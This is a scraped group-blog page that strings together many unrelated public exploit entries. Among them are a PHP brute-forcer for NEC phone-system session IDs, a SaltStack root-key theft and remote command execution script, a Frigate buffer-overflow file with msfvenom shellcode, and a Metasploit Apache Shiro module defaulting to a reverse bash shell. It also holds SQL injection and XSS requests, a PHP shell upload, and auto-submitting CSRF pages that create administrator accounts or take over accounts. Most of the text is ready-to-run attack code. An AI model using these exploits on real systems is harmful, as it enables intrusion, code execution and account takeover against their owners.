# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
# Author: Cold z3ro
# Date: 2020-05-04
# Homepage: https://www.0x30.cc/
# Vendor Homepage: https://www.nec.com
# Version: 01.03.01
# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration
<?php
set_time_limit(0);
$host = "192.168.0.14";
$start = 100;
$end = 30000;
$maxproc= 50;
$execute=0;
echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
sleep(3);
for ($i = $start; $i <= $end; $i++)
{
$pid = @pcntl_fork();
$execute++;
if ($execute >= $maxproc)
{
while (pcntl_waitpid(0, $status) != -1)
{
$status = pcntl_wexitstatus($status);
$execute =0;
usleep(3000);
}
}
if (!$pid)
{
echo $url . " checking $i\n";
login($url, $i);
flush();
exit;
}
}
function login($url, $key)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#');
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
curl_setopt($ch, CURLOPT_TIMEOUT, 80);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
$content = curl_exec($ch);
curl_close ($ch);
if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content))
{
die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n");
}
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863589129
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: PhreeBooks ERP 5.2.5 - Remote Command Execution
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: https://www.phreesoft.com/
# Software Link: https://sourceforge.net/projects/phreebooks/
# Version: v5.2.4, v5.2.5
# Tested on: Xampp
# Credit: İsmail BOZKURT
-------------------------------------------------------------------------------------
There are no file extension controls on Image Manager (5.2.4) and on Backup
Restore. If an authorized user is obtained, it is possible to run a
malicious PHP file on the server.
--------------------------------------------------------------------------------------
One of the Vulnerable File: (backup.php)
-----------------------------------------
RCE PoC (Upload Process)
--------------------------------------------------------------------------------------
POST /pblast/index.php?&p=bizuno/backup/uploadRestore HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 *********************
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pblast/index.php?&p=bizuno/backup/managerRestore
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------39525038724866743160620170
Content-Length: 231
DNT: 1
Connection: close
Cookie: **************************************************
-----------------------------39525038724866743160620170
Content-Disposition: form-data; name="fldFile"; filename="shell.php"
Content-Type: text/php
<? phpinfo(); ?>
-----------------------------39525038724866743160620170--
Shell directory:
-------------------------------
- http://localhost/pblast/myFiles/backups/shell.php
# Title: SimplePHPGal 0.7 - Remote File Inclusion
# Author: h4shur
# date:2020-05-05
# Vendor Homepage: https://johncaruso.ca
# Software Link: https://johncaruso.ca/phpGallery/
# Software Link: https://sourceforge.net/projects/simplephpgal/
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork : intext:"Created with Simple PHP Photo Gallery"
intext:"Created by John Caruso"
### Note:
* Another web application bug is the RFI bug, which can be very dangerous
And stands for Remote File Inclusion, which directly executes loose scripts on the server
Also, this security hole is created by programmer errors
And you must be fluent in programming language to secure and prevent this bug
And you have to control the inputs of the application and use powerful firewalls
* This bug is one of the most dangerous bugs and the access that the intruder can gain using this bug is the implementation of Shell script
In fact, by running Shell script, it will have relatively complete access to the Target site server
If we want to explain it in text, the hacker will execute the shell by giving a link from Shell script in txt format to the input of the vulnerable site.
* what's the solution ?
Check the file entered by the user from a list and enter it if the file was in the list. Example :
<?php
$files=array('test.gif');
if(in_array($_GET['file'], $files)){
include ($_GET['file']);
}
?>
* If you are a server administrator, turn off allow_url_fopen from the file.
* Or do it with the ini_set command. Only for (RFI)
<?php
ini_set('allow_url_fopen ', 'Off');
?>
* We can use the strpos command to check that if the address is: // http, the file will not be enclosed (it can only block RFI)
<?php
$strpos = strpos($_GET['url'],'http://');
if(!$strpos){
include($_GET['url']);
}
?>
* Using str_replace we can give the given address from two characters "/", "." Let's clean up.
<?php
$url=$_GET['url'];
$url = str_replace("/", "", $url);
$url = str_replace(".", "", $url);
include($url);
?>
### Poc :
[+] site.com/image.php?img= [ PAYLOAD ]
# Exploit Title: Online Scheduling System 1.0 - 'username' SQL Injection
# Date: 2020-05-04
# Exploit Author: Saurav Shukla
# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
---------------------------------------------------------------------------------
#parameter Vulnerable: username
# Injected Request
POST /oss/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost
Connection: close
Referer: http://localhost/oss/Register.php
Cookie: PHPSESSID=091v1e2g6109rrbduk924psea9
Upgrade-Insecure-Requests: 1
username=admin' and sleep(50)--+&password=admin&lgn=Add
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
# Exploit Author: Jasper Lievisse Adriaanse
# Vendor Homepage: https://www.saltstack.com/
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Discription: Saltstack authentication bypass/remote code execution
#
# Source: https://github.com/jasperla/CVE-2020-11651-poc
# This exploit is based on this checker script:
# https://github.com/rossengeorgiev/salt-security-backports
#!/usr/bin/env python
#
# Exploit for CVE-2020-11651 and CVE-2020-11652
# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)
# This exploit is based on this checker script:
# https://github.com/rossengeorgiev/salt-security-backports
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import datetime
import os
import os.path
import sys
import time
import salt
import salt.version
import salt.transport.client
import salt.exceptions
def init_minion(master_ip, master_port):
minion_config = {
'transport': 'zeromq',
'pki_dir': '/tmp',
'id': 'root',
'log_level': 'debug',
'master_ip': master_ip,
'master_port': master_port,
'auth_timeout': 5,
'auth_tries': 1,
'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)
}
return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')
# --- check funcs ----
def check_connection(master_ip, master_port, channel):
print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
sys.stdout.flush()
# connection check
try:
channel.send({'cmd':'ping'}, timeout=2)
except salt.exceptions.SaltReqTimeoutError:
print("OFFLINE")
sys.exit(1)
else:
print("ONLINE")
def check_CVE_2020_11651(channel):
print("[+] Checking if vulnerable to CVE-2020-11651... ", end='')
sys.stdout.flush()
try:
rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
except:
print('ERROR')
return None
else:
pass
finally:
if rets:
print('YES')
root_key = rets[2]['root']
return root_key
print('NO')
return None
def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):
print("[+] Checking if vulnerable to CVE-2020-11652 (read_token)... ", end='')
sys.stdout.flush()
# try read file
msg = {
'cmd': 'get_token',
'arg': [],
'token': top_secret_file_path,
}
try:
rets = channel.send(msg, timeout=3)
except salt.exceptions.SaltReqTimeoutError:
print("YES")
except:
print("ERROR")
raise
else:
if debug:
print()
print(rets)
print("NO")
def check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):
print("[+] Checking if vulnerable to CVE-2020-11652 (read)... ", end='')
sys.stdout.flush()
# try read file
msg = {
'key': root_key,
'cmd': 'wheel',
'fun': 'file_roots.read',
'path': top_secret_file_path,
'saltenv': 'base',
}
try:
rets = channel.send(msg, timeout=3)
except salt.exceptions.SaltReqTimeoutError:
print("TIMEOUT")
except:
print("ERROR")
raise
else:
if debug:
print()
print(rets)
if rets['data']['return']:
print("YES")
else:
print("NO")
def check_CVE_2020_11652_write1(debug, channel, root_key):
print("[+] Checking if vulnerable to CVE-2020-11652 (write1)... ", end='')
sys.stdout.flush()
# try read file
msg = {
'key': root_key,
'cmd': 'wheel',
'fun': 'file_roots.write',
'path': '../../../../../../../../tmp/salt_CVE_2020_11652',
'data': 'evil',
'saltenv': 'base',
}
try:
rets = channel.send(msg, timeout=3)
except salt.exceptions.SaltReqTimeoutError:
print("TIMEOUT")
except:
print("ERROR")
raise
else:
if debug:
print()
print(rets)
pp(rets)
if rets['data']['return'].startswith('Wrote'):
try:
os.remove('/tmp/salt_CVE_2020_11652')
except OSError:
print("Maybe?")
else:
print("YES")
else:
print("NO")
def check_CVE_2020_11652_write2(debug, channel, root_key):
print("[+] Checking if vulnerable to CVE-2020-11652 (write2)... ", end='')
sys.stdout.flush()
# try read file
msg = {
'key': root_key,
'cmd': 'wheel',
'fun': 'config.update_config',
'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',
'yaml_contents': 'evil',
'saltenv': 'base',
}
try:
rets = channel.send(msg, timeout=3)
except salt.exceptions.SaltReqTimeoutError:
print("TIMEOUT")
except:
print("ERROR")
raise
else:
if debug:
print()
print(rets)
if rets['data']['return'].startswith('Wrote'):
try:
os.remove('/tmp/salt_CVE_2020_11652.conf')
except OSError:
print("Maybe?")
else:
print("YES")
else:
print("NO")
def pwn_read_file(channel, root_key, path, master_ip):
print("[+] Attemping to read {} from {}".format(path, master_ip))
sys.stdout.flush()
msg = {
'key': root_key,
'cmd': 'wheel',
'fun': 'file_roots.read',
'path': path,
'saltenv': 'base',
}
rets = channel.send(msg, timeout=3)
print(rets['data']['return'][0][path])
def pwn_upload_file(channel, root_key, src, dest, master_ip):
print("[+] Attemping to upload {} to {} on {}".format(src, dest, master_ip))
sys.stdout.flush()
try:
fh = open(src, 'rb')
payload = fh.read()
fh.close()
except Exception as e:
print('[-] Failed to read {}: {}'.format(src, e))
return
msg = {
'key': root_key,
'cmd': 'wheel',
'fun': 'file_roots.write',
'saltenv': 'base',
'data': payload,
'path': dest,
}
rets = channel.send(msg, timeout=3)
print('[ ] {}'.format(rets['data']['return']))
def pwn_exec(channel, root_key, cmd, master_ip, jid):
print("[+] Attemping to execute {} on {}".format(cmd, master_ip))
sys.stdout.flush()
msg = {
'key': root_key,
'cmd': 'runner',
'fun': 'salt.cmd',
'saltenv': 'base',
'user': 'sudo_user',
'kwarg': {
'fun': 'cmd.exec_code',
'lang': 'python',
'code': "import subprocess;subprocess.call('{}',shell=True)".format(cmd)
},
'jid': jid,
}
try:
rets = channel.send(msg, timeout=3)
except Exception as e:
print('[-] Failed to submit job')
return
if rets.get('jid'):
print('[+] Successfully scheduled job: {}'.format(rets['jid']))
def pwn_exec_all(channel, root_key, cmd, master_ip, jid):
print("[+] Attemping to execute '{}' on all minions connected to {}".format(cmd, master_ip))
sys.stdout.flush()
msg = {
'key': root_key,
'cmd': '_send_pub',
'fun': 'cmd.run',
'user': 'root',
'arg': [ "/bin/sh -c '{}'".format(cmd) ],
'tgt': '*',
'tgt_type': 'glob',
'ret': '',
'jid': jid
}
try:
rets = channel.send(msg, timeout=3)
except Exception as e:
print('[-] Failed to submit job')
return
finally:
if rets == None:
print('[+] Successfully submitted job to all minions.')
else:
print('[-] Failed to submit job')
def main():
parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')
parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')
parser.add_argument('--port', '-p', dest='master_port', default='4506')
parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')
parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')
parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')
parser.add_argument('--read', '-r', dest='read_file')
parser.add_argument('--upload-src', dest='upload_src')
parser.add_argument('--upload-dest', dest='upload_dest')
parser.add_argument('--exec', dest='exec', help='Run a command on the master')
parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')
args = parser.parse_args()
print("[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.")
time.sleep(1)
# Both src and destination are required for uploads
if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):
print('[-] Must provide both --upload-src and --upload-dest')
sys.exit(1)
channel = init_minion(args.master_ip, args.master_port)
check_connection(args.master_ip, args.master_port, channel)
root_key = check_CVE_2020_11651(channel)
if root_key:
print('[*] root key obtained: {}'.format(root_key))
else:
print('[-] Failed to find root key...aborting')
sys.exit(127)
if args.run_checks:
# Assuming this check runs on the master itself, create a file with "secret" content
# and abuse CVE-2020-11652 to read it.
top_secret_file_path = '/tmp/salt_cve_teta'
with salt.utils.fopen(top_secret_file_path, 'w') as fd:
fd.write("top secret")
# Again, this assumes we're running this check on the master itself
with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:
root_key = keyfd.read()
check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)
check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)
check_CVE_2020_11652_write1(debug, channel, root_key)
check_CVE_2020_11652_write2(debug, channel, root_key)
os.remove(top_secret_file_path)
sys.exit(0)
if args.read_file:
pwn_read_file(channel, root_key, args.read_file, args.master_ip)
if args.upload_src:
if os.path.isabs(args.upload_dest):
print('[-] Destination path must be relative; aborting')
sys.exit(1)
pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)
jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())
if args.exec:
pwn_exec(channel, root_key, args.exec, args.master_ip, jid)
if args.exec_all:
print("[!] Lester, is this what you want? Hit ^C to abort.")
time.sleep(2)
pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)
if __name__ == '__main__':
main()
# Exploit Title: Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path
# Discovery by: Nguyen Khang - SunCSR
# Discovery Date: 2020-05-03
# Vendor Homepage: https://www.oracle.com/
# Software Link: https://www.oracle.com/database/technologies/112010-win64soft.html
# Tested Version: 11g release 2
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363
# Step to discover Unquoted Service Path:
C:\Users\cm0s>wmic service get name,pathname,displayname,startmode |
findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
OracleDBConsoleorcl OracleDBConsoleorcl
C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe Auto
OracleOraDb11g_home1TNSListener OracleOraDb11g_home1TNSListener
C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR Auto
OracleServiceORCL OracleServiceORCL
c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL Auto
C:\Users\cm0s>sc qc OracleDBConsoleorcl
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: OracleDBConsoleorcl
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME :
C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OracleDBConsoleorcl
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\cm0s>sc qc OracleOraDb11g_home1TNSListener
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: OracleOraDb11g_home1TNSListener
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OracleOraDb11g_home1TNSListener
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\cm0s>sc qc OracleServiceORCL
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: OracleServiceORCL
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME :
c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OracleServiceORCL
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
# A successful attempt would require the local user to be able to insert
# their code in the system root path
# undetected by the OS or other security applications where it could
# potentially be executed during
# application startup or reboot. If successful, the local user's code would
# execute with the elevated
# privileges of the application.
# Exploit Title: Frigate 3.36 - Buffer Overflow (SEH)
# Exploit Author: Xenofon Vassilakopoulos
# Date: 2020-05-03
# Version: 3.36
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
# Tested on: Windows 7 Professional SP1 x86
# Steps to reproduce :
# 1. generate the test.txt using this exploit
# 2. copy the contents of the test.txt to clipboard
# 3. open Frigate3 then go to Disk -> Find Computer
# 4. paste the contents to computer name
# 5. calculator will execute
import struct
filename = 'test.txt'
junk = "A"*4112
nseh = "\xeb\x1A\x90\x90"
seh = struct.pack('L',0x40171c45) # pop esi # pop ebx # ret
nop="\x90"*18
junk2 = "\x71\x71\x90\x90"
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python
buf = b""
buf += b"\x89\xe7\xda\xc7\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
buf += b"\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x68\x68\x6d\x52"
buf += b"\x77\x70\x63\x30\x73\x30\x35\x30\x6d\x59\x38\x65\x34"
buf += b"\x71\x69\x50\x70\x64\x4c\x4b\x56\x30\x44\x70\x6e\x6b"
buf += b"\x36\x32\x74\x4c\x6c\x4b\x30\x52\x76\x74\x4e\x6b\x71"
buf += b"\x62\x51\x38\x64\x4f\x78\x37\x42\x6a\x45\x76\x76\x51"
buf += b"\x4b\x4f\x6e\x4c\x47\x4c\x43\x51\x63\x4c\x44\x42\x36"
buf += b"\x4c\x61\x30\x6f\x31\x38\x4f\x56\x6d\x45\x51\x69\x57"
buf += b"\x38\x62\x6c\x32\x63\x62\x33\x67\x4e\x6b\x76\x32\x42"
buf += b"\x30\x4e\x6b\x50\x4a\x75\x6c\x4c\x4b\x42\x6c\x57\x61"
buf += b"\x51\x68\x6a\x43\x73\x78\x63\x31\x6a\x71\x43\x61\x6e"
buf += b"\x6b\x73\x69\x37\x50\x35\x51\x78\x53\x6e\x6b\x42\x69"
buf += b"\x65\x48\x4a\x43\x36\x5a\x51\x59\x4e\x6b\x46\x54\x4c"
buf += b"\x4b\x53\x31\x69\x46\x70\x31\x49\x6f\x4c\x6c\x4f\x31"
buf += b"\x48\x4f\x66\x6d\x45\x51\x4f\x37\x66\x58\x49\x70\x63"
buf += b"\x45\x5a\x56\x36\x63\x73\x4d\x7a\x58\x65\x6b\x63\x4d"
buf += b"\x34\x64\x44\x35\x4a\x44\x63\x68\x4c\x4b\x33\x68\x44"
buf += b"\x64\x66\x61\x38\x53\x52\x46\x4e\x6b\x34\x4c\x50\x4b"
buf += b"\x6e\x6b\x43\x68\x75\x4c\x76\x61\x6e\x33\x4e\x6b\x55"
buf += b"\x54\x6e\x6b\x53\x31\x38\x50\x4f\x79\x43\x74\x37\x54"
buf += b"\x76\x44\x51\x4b\x31\x4b\x53\x51\x36\x39\x50\x5a\x32"
buf += b"\x71\x79\x6f\x79\x70\x43\x6f\x53\x6f\x52\x7a\x4e\x6b"
buf += b"\x67\x62\x48\x6b\x4e\x6d\x43\x6d\x72\x4a\x47\x71\x6e"
buf += b"\x6d\x4d\x55\x4e\x52\x57\x70\x37\x70\x67\x70\x62\x70"
buf += b"\x32\x48\x70\x31\x6e\x6b\x32\x4f\x6c\x47\x39\x6f\x69"
buf += b"\x45\x4d\x6b\x58\x70\x4e\x55\x4d\x72\x51\x46\x30\x68"
buf += b"\x4e\x46\x6f\x65\x4d\x6d\x6d\x4d\x6b\x4f\x39\x45\x45"
buf += b"\x6c\x33\x36\x53\x4c\x37\x7a\x4b\x30\x49\x6b\x49\x70"
buf += b"\x32\x55\x45\x55\x6d\x6b\x33\x77\x44\x53\x42\x52\x50"
buf += b"\x6f\x43\x5a\x67\x70\x33\x63\x4b\x4f\x59\x45\x42\x43"
buf += b"\x65\x31\x52\x4c\x45\x33\x35\x50\x41\x41"
payload = junk + nseh + seh + nop + junk2 + buf
print "[+] Creating file %s" % filename
with open(filename, 'w') as f:
f.write(payload)
print " File created, wrote %d bytes to file" % len(payload)
# Title: addressbook 9.0.0.1 - 'id' SQL Injection
# Date: 2020-04-01
# Author: David Velazquez a.k.a. d4sh&r000
# vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download
# vulnerable version: 9.0.0.1
# Discription: addressbook 9.0.0.1 time-based blind SQL injection
# Tested On: Ubuntu Server 20.04 LTS
# Platform: PHP
# Type: webapp
# Use:
# addressbook9-SQLi.py #http://127.0.0.1/photo.php?id=1'
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests
def isVulnerable(URL):
"""Check if the URL is vulnerable to ime-based blind SQL injection"""
response = requests.get(URL+'%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
s=response.elapsed.total_seconds()
if s>5:#I put a sleep sentence to test the bug
sys.stdout.write('[+] Aplication is vulnerable!!!\n')
else:
sys.stdout.write('[+] Aplication NOT vulnerable\n')
if __name__ == "__main__":
isVulnerable(sys.argv[1])
# Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
# Author: Mehmet Kelepce / Gais Cyber Security
# Date : 2020-03-24
# Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
# Vendor: http://osticket.com
# Remotely Exploitable: Yes
# Dynamic Coding Language: PHP
# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)
## this vulnerability was found by examining the source code.
PoC : Ticket SLA Plan Name - HTTP POST REQUEST
##########################################################
POST /upload/scp/slas.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/upload/scp/slas.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Connection: close
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
Upgrade-Insecure-Requests: 1
submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0¬es=
Vulnerable parameter: name
Parameter file: /scp/slass.php
I used the name of the SLA for any ticket.
## Risk : cookie information of the target user is obtained.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE',
'Description' => %q{
This vulnerability allows remote attackers to execute arbitrary code on vulnerable
installations of Apache Shiro v1.2.4.
},
'License' => MSF_LICENSE,
'Author' =>
[
'L / l-codes[at]qq.com' # Metasploit module
],
'References' =>
[
['CVE', '2016-4437'],
['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1']
],
'Platform' => %w{ win unix },
'Arch' => [ ARCH_CMD ],
'Targets' =>
[
[
'Unix Command payload',
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
],
[
'Windows Command payload',
'Arch' => ARCH_CMD,
'Platform' => 'win'
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 7 2016',
'Privileged' => false,
'DefaultOptions' =>
{
'WfsDelay' => 5
}
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
])
end
def aes_encrypt(payload)
aes = OpenSSL::Cipher.new('aes-128-cbc')
aes.encrypt
aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==')
aes.random_iv + aes.update(payload) + aes.final
end
def exploit
cmd = payload.encoded
vprint_status("Execute CMD: #{cmd}")
type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' )
java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type)
ciphertext = aes_encrypt(java_payload)
base64_ciphertext = Rex::Text.encode_base64(ciphertext)
send_request_cgi({
'uri' => target_uri.path,
'method' => 'GET',
'cookie' => "rememberMe=#{base64_ciphertext}"
})
end
end
# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.1.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56901
# PoC: https://github.com/DRAGOWN/CVE-2024-56901
A Cross-Site Request Forgery (CSRF) vulnerability in Geovision GV-ASManager web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with CVE-2024-56903 for a successful CSRF attack.
Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.1.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Administrator's interaction with an open session in the browser
Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A unauthorized account is able to:
- Modify POST method request with GET by leveraging CVE-2024-56903 vulnerability.
- Craft a malicious HTML page which makes changes in the application on behalf of the administrator account.
- Create a new administrator account on behalf of the legit administrator account.
After the successful attack, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization.
The CSRF code:
<html>
<body>
<form action="https://[TARGET]/ASWeb/bin/ASWebCommon.srf"> # Set the target
<input type="hidden" name="action" value="UA_SetCreateAccount" />
<input type="hidden" name="id" value="Malicious" /> # Set Username
<input type="hidden" name="password" value="Youarecracked999!" /> # Set Password
<input type="hidden" name="email" value="Malicious@geovision.com.tw" /> # Set Email
<input type="hidden" name="level" value="2" /> # Set privilege 1-Normal user 2-Administrator
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS
# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
# Exploit Author: Faiz Ahmed Zaidi
# Vendor Homepage: [https://ofbiz.apache.org/security.html]
# Software Link: https://ofbiz.apache.org/download.html#security
# Version: Before 17.12.03
# Tested on: Linux and Windows
# CVE : CVE-2019-0235
#Exploit Code:
<html>
<body>
<form action="https://hostipaddress:8443/partymgr/control/updateEmailAddress" method="POST">
<input type="hidden" name="contactMechId" value="admin" />
<input type="hidden" name="contactMechTypeId" value="EMAIL_ADDRESS" />
<input type="hidden" name="partyId" value="admin" />
<input type="hidden" name="DONE_PAGE" value="viewprofile?party_id=admin∂yId=admin" />
<input type="hidden" name="emailAddress" value="attackeremail@id.com" />
<input type="hidden" name="allowSolicitation" value="Y" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
After that do a password reset via forget password.
It's done :)
# Title: HardDrive 2.1 for iOS - Arbitrary File Upload
# Author: Vulnerability Laboratory
# Date: 2020-04-30
# Software: https://apps.apple.com/ch/app/harddrive/id383226784
# CVE: N/A
Document Title:
===============
HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2221
Common Vulnerability Scoring System:
====================================
7.4
Product & Service Introduction:
===============================
